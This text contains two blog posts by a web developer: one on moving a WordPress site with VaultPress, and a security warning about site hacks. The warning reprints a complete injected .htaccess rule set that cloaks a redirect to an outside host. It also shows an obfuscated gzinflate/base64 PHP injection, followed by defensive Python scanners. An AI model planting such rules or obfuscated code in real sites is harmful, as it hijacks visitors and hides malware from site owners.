
Moving Sites with VaultPress


I am going to be moving the main www.charlestonsw.com site soon and decided to try a new process. I recently subscribed to VaultPress backups and thought I'd give that a try as a simple way to move the main WordPress site. It should carry over all the WordPress directory files as well as the database. My supporting apps living outside the WordPress world need to be brought over separately.

VaultPress has a new feature where you can restore your backup to an alternate location using an FTP/FTPS login that you provide (use FTPS rather than plain FTP where the host supports it, so the login and the restored files are not sent in the clear). Overall the process went smoothly with a few caveats. VaultPress will likely resolve these issues soon, so be sure to check with them for any feature changes. The issues I ran into and their fixes are noted here:

Home & SiteURL

The home and siteurl rows in the newly restored wp_options table were wrong. They had been rewritten to point at my temporary placeholder (wp.charlestonsw.com), but the leading http:// was dropped from both, which produces broken links throughout the site. I prefer the MySQL command line, so I went there and ran:

mysql> update wp_options set option_value='http://wp.charlestonsw.com' where option_name='home' or option_name='siteurl';

.htaccess File

The VaultPress backup does not grab hidden files, like .htaccess. I guess they assume this is already set up on the new site, however the new site's permalink rules may not match the old site's. IMO this should be part of the backup/restore set. There are two ways to fix this. You can copy your old .htaccess file "by hand" to the new server; read it before you do, since a compromised site's .htaccess can carry injected rewrite rules, and a move is a good moment to start from a clean one. The other option is to look at the permalink setting in your old admin panel, then go to the new admin panel, select something DIFFERENT, save, and set it back. This re-creates the necessary file, assuming your directory permissions are correct. This is usually a good idea when you change site URLs anyway, as it clears the cache for a variety of plugins and internal "gears" of WordPress.


Thus far those are the only two "gotchas" I've found. Of course I still need to get my other databases and scripts moved, but I can use typical scp or rsync commands to pull server-to-server and a mysqldump/restore for the databases. Luckily the other items are only my internal reports, so it should cause fewer headaches if something goes missing for a day or two.




Hackers Redirecting Websites (.htaccess)

A quick note to fellow webmasters as well as business owners running websites. We have seen a recent rash of brute force login attempts on our servers and our clients' servers, and several of them have succeeded in the past three months. Below are a couple of things to look for and some best practices for keeping your site and your data secure.

Best Practices

The following best practices will help thwart many of the attempts to break into your account using a brute force "cracker".

Do Not Share Your Password

Do not share your passwords with anyone.  If you have a vendor you need to work with or an employee that needs access, create a specific login for them with their own passwords.

Do Not Dole Out Access Easily

Before creating a new account with access to your server, first ask yourself whether the person truly needs it. If this is a limited one-time request, consider setting up a generic vendor account that you re-use. Change the password as soon as they are done with it, and never let more than one person, vendor or client use the account at a time.

Use A Strong Password

This cannot be emphasized enough. Do NOT use simple passwords. Do not use passwords based on a single dictionary word. DO use passwords with punctuation, capitalization and, above all, length. The most common passwords are still "password" and "password1". Brute force and dictionary attacks only succeed against short or predictable passwords.

Try something like a jumbled phrase with special-character replacements. Even MyP@ssW0rd! is better than 90% of the passwords people use, but keep in mind that swapping @ for a and 0 for o in a dictionary word is exactly the kind of substitution that cracking tools apply automatically, so a single disguised word buys less than it looks. Get creative: "IDon'tLikeMilk!" or "DoYouLikeMilk2?" are easy to remember and, being long multi-word phrases, hard for brute force bots to guess.

Footprints Left By Hackers

Most of the people breaking into sites this way have little interest in your data or in doing something directly malicious to your site. The most common motive is to either distribute malware to your visitors or to earn revenue from "pay per click" programs like Google AdSense.

Most often this means adding code to your site while keeping your site functional.  It does them no good if the site breaks.  They want people visiting your site while a program is downloaded to their browser behind-the-scenes or they are redirected to a site they didn’t intend to visit.  Some of the hacks even pop-under a browser window with an ad, click the ad, then close the window before you see it… earning the hacker 25-cents in the process.

.htaccess Modification

This is one we've seen a few times: the .htaccess file on your server redirects a subset of page requests to a site the attacker gets paid to send traffic to. Read the conditions in front of the RewriteRule carefully, because they are what keeps the hack hidden. The redirect only fires when the request is a plain GET over HTTP (not HTTPS), the referer is a search engine, the user agent says Windows and does not look like a crawler or a script, the file is not an image or archive, and the visitor does not yet carry a cookie named ADb. The CO= flag on the rule sets that cookie on the first redirect, so each visitor is bounced exactly once and then sees the normal site. The site owner, who types the URL directly or uses a bookmark, never arrives from a search engine and never sees it, and the search engine crawlers themselves are excluded by user agent, so the site keeps its rankings. The IfModule prefork.c wrapper is true on any prefork Apache and is there to look like ordinary configuration, and the long hex comment after the closing tag is apparently a marker the injector leaves so it can find its own block again.

<IfModule prefork.c>
RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^GET$
RewriteCond %{HTTP_REFERER} ^(http\:\/\/)?([^\/\?]*\.)?(google\.|yahoo\.|bing\.|msn\.|ask\.|excite\.|altavista\.|netscape\.|aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.|lycos\.|metacrawler\.|mail\.|dogpile\?).*$ [NC]
RewriteCond %{HTTP_REFERER} !^.*(imgres\?q).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(bing|Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Diagnostics|DTAAgent|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|Fuck\sYou|Google).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|iPhone|IRIX|Jakarta|JetBrains).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Mac\_PPC|Mac\s10|Mac\sOS|macDN|Macintosh|Mediapartners|Megite|MetaProducts).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(WinHTTP|WinNT4|WordPress|WWWeasel|wwwster|yacy|Yahoo).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$ [NC]
RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png|.*jpeg|.*mpg|.*avi|.*zip|.*gz|.*tar|.*ico$ [NC]
RewriteCond %{HTTP_COOKIE} !^.*ADb.*$ [NC]
RewriteCond %{HTTP_USER_AGENT} .*Windows.* [NC]
RewriteCond %{HTTPS} ^off$
RewriteRule ^(.*)$ http://kike.therealtruthaboutaging.com/url?sa=t&source=web&cd=15&ved=0vFu49G3C&url=http://%{HTTP_HOST}%{REQUEST_URI}&ei=2ZMoeqjO6K+yqY2OyVEw8J+1pw==&usg=M4kjonDdK-kwm0WO2JdBFM&sig2=HKhlYtbOgR6MTETnCv3UJQ [R=302,L,CO=ADb:36:%{HTTP_HOST}:11060:/:0:HttpOnly]
</IfModule>
#5fc0e7448401802b00b0ad059685814b08cb5bd44015bae3c857ee73
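The following is an added example, not code from the original post: a small Python scanner that looks for the shape of rule set just shown, that is, a RewriteRule whose target is an absolute URL on a foreign host, gated by referer, cookie and user-agent conditions. The two .htaccess samples embedded in it are constructed for the example (the malicious one condenses the injected block above and uses a placeholder redirect host), and the site host names passed to scan_htaccess are assumptions.

```python
import re
from urllib.parse import urlparse

# Referer tokens that appear in the search-engine gate of the injected rule set.
SEARCH_ENGINES = ("google", "yahoo", "bing", "msn", "ask", "aol", "yandex")


def _assess_rule(lineno, target, flags, conds, site_hosts, in_prefork):
    """Return a finding dict if this RewriteRule sends visitors off-site, else None."""
    parsed = urlparse(target)
    if parsed.scheme not in ("http", "https"):
        return None                         # internal rewrite such as /index.php or "-"
    host = parsed.hostname or ""
    if host in site_hosts or host.startswith("%{"):
        return None                         # our own host, or https://%{HTTP_HOST}/... canonicalisation
    signals = [f"sends visitors to off-site host {host} [{flags}]"]
    cond_text = "\n".join(conds)
    if "HTTP_REFERER" in cond_text and any(e in cond_text.lower() for e in SEARCH_ENGINES):
        signals.append("fires only for visitors arriving from a search engine")
    if "HTTP_COOKIE" in cond_text or "CO=" in flags:
        signals.append("cookie-gated: each visitor is redirected once, then left alone")
    if re.search(r"HTTP_USER_AGENT\}\s+!", cond_text):
        signals.append("skips crawlers and bots by user agent")
    if "HTTPS" in cond_text:
        signals.append("HTTP-only: HTTPS requests are left untouched")
    if in_prefork:
        signals.append("wrapped in <IfModule prefork.c>, which is true on any prefork Apache")
    return {"line": lineno, "target": target, "signals": signals}


def scan_htaccess(text, site_hosts):
    """Scan .htaccess text; report RewriteRules that redirect off-site plus any
    injection marker comment (a line that is nothing but a long hex string)."""
    site_hosts = {h.lower() for h in site_hosts}
    findings, conds, in_prefork = [], [], False
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        lowered = line.lower()
        if lowered.startswith("<ifmodule"):
            in_prefork = "prefork.c" in lowered
        elif lowered.startswith("</ifmodule"):
            in_prefork = False
        elif lowered.startswith("rewritecond"):
            conds.append(line)
        elif lowered.startswith("rewriterule"):
            parts = line.split(None, 3)     # RewriteRule <pattern> <target> [flags]
            if len(parts) >= 3:
                flags = parts[3] if len(parts) == 4 else ""
                finding = _assess_rule(lineno, parts[2], flags, conds, site_hosts, in_prefork)
                if finding:
                    findings.append(finding)
            conds = []                      # RewriteCond lines apply only to the next RewriteRule
        elif re.fullmatch(r"#[0-9a-f]{32,}", lowered):
            findings.append({"line": lineno, "target": None,
                             "signals": ["hex-only comment, typical injection marker"]})
    return findings


# Constructed samples, not files from a real server. MALICIOUS condenses the injected
# rule set shown above; the redirect host is a placeholder.
MALICIOUS = r"""<IfModule prefork.c>
RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^GET$
RewriteCond %{HTTP_REFERER} ^(http\:\/\/)?([^\/\?]*\.)?(google\.|yahoo\.|bing\.|msn\.).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(bot|Crawl|curl|spider|wget|Google|Yahoo|Yandex).*$ [NC]
RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png|.*ico$ [NC]
RewriteCond %{HTTP_COOKIE} !^.*ADb.*$ [NC]
RewriteCond %{HTTP_USER_AGENT} .*Windows.* [NC]
RewriteCond %{HTTPS} ^off$
RewriteRule ^(.*)$ http://redirector.example/url?u=http://%{HTTP_HOST}%{REQUEST_URI} [R=302,L,CO=ADb:36:%{HTTP_HOST}:11060:/:0:HttpOnly]
</IfModule>
#5fc0e7448401802b00b0ad059685814b08cb5bd44015bae3c857ee73
"""

# A stock WordPress permalink block plus a force-HTTPS rule: both must pass clean.
BENIGN = r"""# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
RewriteCond %{HTTPS} off
RewriteRule ^(.*)$ https://%{HTTP_HOST}%{REQUEST_URI} [R=301,L]
</IfModule>
# END WordPress
"""

if __name__ == "__main__":
    import sys
    # usage: python scan_htaccess.py /path/to/.htaccess www.example.com example.com
    path, hosts = sys.argv[1], set(sys.argv[2:])
    with open(path, errors="replace") as fh:
        for f in scan_htaccess(fh.read(), hosts):
            print(f"line {f['line']}: {f['target'] or ''}")
            for s in f["signals"]:
                print("   -", s)
```

The scanner deliberately treats a redirect to your own host, or to a target built from %{HTTP_HOST}, as normal, since www-canonicalisation and force-HTTPS rules look like that; what it reports is the combination of an off-site destination with the visitor-selection conditions, which is the fingerprint of a cloaked redirect rather than of ordinary rewrite configuration.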

index.php / index.htm modification

Here the hacker inserts an encoded blob into one of your PHP pages: the real code is compressed and base64-encoded, then unpacked at run time with gzinflate(base64_decode(...)) and handed to echo or eval. What it emits runs in the visitor's browser and, depending on the payload, can do anything from forcing a download to dropping a tracking cookie to hijacking the user's search bar. Some of these are very nasty; others only do a relatively harmless (but annoying) browser redirect. The #d93065# and #/d93065# comments bracket the injected block, apparently so the injector can find and replace its own code later, and the require() of the real header keeps the page working so the owner notices nothing.

<? require ("the_real_header.php");
#d93065#
echo(gzinflate(base64_decode("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")));
#/d93065#
?>
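To see what such a blob does without running it, decode it offline: PHP's gzinflate() is raw DEFLATE, which zlib handles with a negative window size. The Python below is an added example, not code from the original post. It finds echo/eval(gzinflate(base64_decode(...))) calls, peels nested layers (the first layer very often unpacks to another such call), and reports the paired #xxxxxx# markers. The two-layer sample it scans is constructed inside the script, with a placeholder landing host, so it runs offline.

```python
import base64
import re
import sys
import zlib
from pathlib import Path

# echo/eval/assert of gzinflate(base64_decode('...')) with a literal blob argument.
OBFUSCATED_CALL = re.compile(
    r"(eval|echo|assert)\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*"
    r"['\"]([A-Za-z0-9+/=]+)['\"]\s*\)\s*\)\s*\)",
    re.IGNORECASE,
)
# Paired #xxxxxx# ... #/xxxxxx# comments that bracket an injected block.
MARKER = re.compile(r"#([0-9a-f]{6})#.*?#/\1#", re.DOTALL)


def php_gzinflate(data: bytes) -> bytes:
    """PHP gzinflate() is raw DEFLATE with no zlib/gzip header: wbits=-15 for zlib."""
    return zlib.decompress(data, -15)


def php_gzdeflate(data: bytes) -> bytes:
    """Inverse of the above; used only to build the constructed sample below."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    return c.compress(data) + c.flush()


def extract_payloads(php_source: str):
    """Decode every obfuscated call found in php_source without executing anything."""
    out = []
    for m in OBFUSCATED_CALL.finditer(php_source):
        sink, blob = m.group(1).lower(), m.group(2)
        try:
            decoded = php_gzinflate(base64.b64decode(blob)).decode("utf-8", "replace")
        except (ValueError, zlib.error) as exc:      # truncated or hand-mangled blob
            decoded = f"<undecodable: {exc}>"
        out.append({"sink": sink, "offset": m.start(), "decoded": decoded})
    return out


def decode_nested(php_source: str, max_depth: int = 10):
    """Peel layers: the first decoded layer usually contains another such call."""
    layers, current = [], php_source
    for _ in range(max_depth):
        found = extract_payloads(current)
        if not found or found[0]["decoded"].startswith("<undecodable"):
            break
        current = found[0]["decoded"]
        layers.append(current)
    return layers


def find_markers(php_source: str):
    return [m.group(1) for m in MARKER.finditer(php_source)]


# Constructed two-layer sample (not a real capture): the outer eval() unpacks a PHP
# statement, which in turn echoes a JavaScript redirect to a placeholder host.
INJECTED_JS = "<script>document.location='http://landing.example/go.php'</script>"
_inner_php = 'echo(gzinflate(base64_decode("%s")));' % base64.b64encode(
    php_gzdeflate(INJECTED_JS.encode())).decode()
_outer_blob = base64.b64encode(php_gzdeflate(_inner_php.encode())).decode()
SAMPLE_PHP = f"""<? require ("the_real_header.php");
#d93065#
eval(gzinflate(base64_decode("{_outer_blob}")));
#/d93065#
?>"""


def scan_tree(root):
    """Walk a web root and yield files carrying obfuscated calls or marker pairs."""
    for path in Path(root).rglob("*"):
        if path.suffix.lower() not in (".php", ".htm", ".html", ".js"):
            continue
        text = path.read_text(errors="replace")
        markers, layers = find_markers(text), decode_nested(text)
        if markers or layers:
            yield path, markers, layers


if __name__ == "__main__":
    # usage: python find_injected.py /var/www/html
    for path, markers, layers in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{path}: markers={markers}")
        for depth, layer in enumerate(layers, 1):
            print(f"  layer {depth}: {layer[:120]}")
```

Decoding this way is safe because nothing is evaluated: the blob is only inflated and printed, so a payload that would, say, write a backdoor when run through eval() is merely displayed. A blob that the regex finds but zlib cannot inflate is reported as undecodable rather than skipped, since an attacker-mangled stream is itself worth a look.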

Summary

We hope that by getting this information online people start to learn a bit more about site security. Insecure sites not only slow down the browser and degrade the overall user experience, they can have much larger, far-reaching effects that people don't even think of. One of the larger terrorist groups was found to be partly funded by Internet hacks like these: 25-cents-at-a-time clicks added up to over $1M that went straight into the terrorist network. Now that's a lot of clicks! Imagine if they used this for a good cause, donating food or shelter to people in need, but that is a story for another site.

In the meantime, secure your site, remove the hacks, and create a better experience for your visitors.